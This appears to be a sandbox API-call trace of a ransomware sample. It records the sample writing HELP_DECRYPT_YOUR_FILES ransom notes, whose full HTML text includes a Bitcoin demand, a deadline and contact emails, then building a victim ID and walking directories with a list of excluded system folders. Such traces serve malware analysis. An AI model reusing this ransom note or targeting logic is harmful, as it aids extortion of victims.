	[0177.387] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0177.388] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0177.389] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0177.389] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0177.389] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0177.389] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0177.389] CloseHandle (hObject=0x388) returned 1
	[0177.390] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0177.390] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0177.390] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0177.390] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\HELP_DECRYPT_YOUR_FILES.HTML") returned 100
	[0177.390] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0177.391] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0177.391] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0177.394] CloseHandle (hObject=0x388) returned 1
	[0177.394] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0177.395] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0177.395] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0177.395] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0177.396] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.396] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0177.397] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0177.397] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0177.397] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0177.397] CloseHandle (hObject=0x388) returned 1
	[0177.397] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\*.*" (normalized: "c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8343a833, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0177.398] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\*.*") returned 75
	[0177.398] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.398] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\*.*", cchLength=0x4b | out: lpsz="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*") returned 0x4b
	[0177.398] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.398] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="windows") returned 0x0
	[0177.398] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.398] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="boot") returned 0x0
	[0177.398] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.399] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="system volume information") returned 0x0
	[0177.399] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.399] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.399] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.399] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="temp") returned 0x0
	[0177.399] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.399] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="program files") returned 0x0
	[0177.399] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.400] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.400] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.400] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="appdata") returned 0x0
	[0177.400] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.400] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="application data") returned 0x0
	[0177.400] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.400] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="winnt") returned 0x0
	[0177.400] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.400] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="tmp") returned 0x0
	[0177.402] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.402] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="cache") returned 0x0
	[0177.402] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.402] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.402] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.402] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="webcache") returned 0x0
	[0177.402] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.403] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="inetcache") returned 0x0
	[0177.403] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.403] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="nvidia") returned 0x0
	[0177.403] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.403] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="packages") returned 0x0
	[0177.403] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.403] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="cookies") returned 0x0
	[0177.403] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.404] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\vault\\ac658cb4-9126-49bd-b877-31eedab3f204\\*.*", lpSrch="programdata") returned 0x0
	[0177.404] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0177.404] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0177.404] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x8343a833, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.404] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0177.404] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="154E23D0-C644-4E6F-8CE6-5069272F999F.vsch", cAlternateFileName="154E23~1.VSC")) returned 1
	[0177.404] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x6e, dwReserved0=0x0, dwReserved1=0x0, cFileName="2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch", cAlternateFileName="2F1A65~1.VSC")) returned 1
	[0177.404] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x106, dwReserved0=0x0, dwReserved1=0x0, cFileName="3CCD5499-87A8-4B10-A215-608888DD3B55.vsch", cAlternateFileName="3CCD54~1.VSC")) returned 1
	[0177.404] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8343a833, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x8343a833, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8343a833, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0177.404] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x834149ed, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x834149ed, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x8343a833, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0177.404] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Policy.vpol", cAlternateFileName="POLICY~1.VPO")) returned 1
	[0177.405] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x448c3dac, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x448c3dac, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x448c3dac, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x1bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Policy.vpol", cAlternateFileName="POLICY~1.VPO")) returned 0
	[0177.405] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0177.405] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0177.405] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x833c8089, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x833c8089, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x833ee2c0, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0177.405] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x833a2074, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x833a2074, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x833a2074, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0177.405] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x833a2074, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x833a2074, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x833a2074, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0177.406] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 1
	[0177.406] FindClose (in: hFindFile=0xfb9bf0 | out: hFindFile=0xfb9bf0) returned 0
	[0177.406] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd2c3a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd2c3a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WDF", cAlternateFileName="")) returned 1
	[0177.406] lstrcmpW (lpString1="WDF", lpString2="..") returned 1
	[0177.406] lstrcmpW (lpString1="WDF", lpString2=".") returned 1
	[0177.407] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0177.407] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0177.407] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="WDF" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WDF") returned="C:\\Users\\All Users\\Microsoft\\WDF"
	[0177.407] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\WDF" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WDF") returned="C:\\Users\\All Users\\Microsoft\\WDF"
	[0177.407] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WDF", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WDF\\") returned="C:\\Users\\All Users\\Microsoft\\WDF\\"
	[0177.407] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\WDF\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WDF\\") returned="C:\\Users\\All Users\\Microsoft\\WDF\\"
	[0177.407] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\WDF\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\WDF\\*.*") returned="C:\\Users\\All Users\\Microsoft\\WDF\\*.*"
	[0177.407] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\WDF\\*.*" (normalized: "c:\\users\\all users\\microsoft\\wdf\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd2c3a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd2c3a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0177.408] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\WDF\\*.*") returned 36
	[0177.408] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0177.408] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\WDF\\*.*", cchLength=0x24 | out: lpsz="c:\\users\\all users\\microsoft\\wdf\\*.*") returned 0x24
	[0177.408] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.408] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="windows") returned 0x0
	[0177.409] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.409] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="boot") returned 0x0
	[0177.409] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.409] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="system volume information") returned 0x0
	[0177.409] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.409] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0177.409] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.409] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="temp") returned 0x0
	[0177.410] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.410] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="program files") returned 0x0
	[0177.410] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.410] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="program files (x86)") returned 0x0
	[0177.410] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.410] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="appdata") returned 0x0
	[0177.410] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.410] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="application data") returned 0x0
	[0177.411] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.411] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="winnt") returned 0x0
	[0177.411] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.411] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="tmp") returned 0x0
	[0177.411] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.411] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="cache") returned 0x0
	[0177.411] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.412] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="temporary internet files") returned 0x0
	[0177.412] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.412] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="webcache") returned 0x0
	[0177.412] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.412] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="inetcache") returned 0x0
	[0177.412] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.412] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="nvidia") returned 0x0
	[0177.412] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.413] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="packages") returned 0x0
	[0177.413] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.413] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="cookies") returned 0x0
	[0177.413] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0177.413] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\wdf\\*.*", lpSrch="programdata") returned 0x0
	[0177.413] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd2c3a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd2c3a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0177.413] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd2c3a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd2c3a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0177.414] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
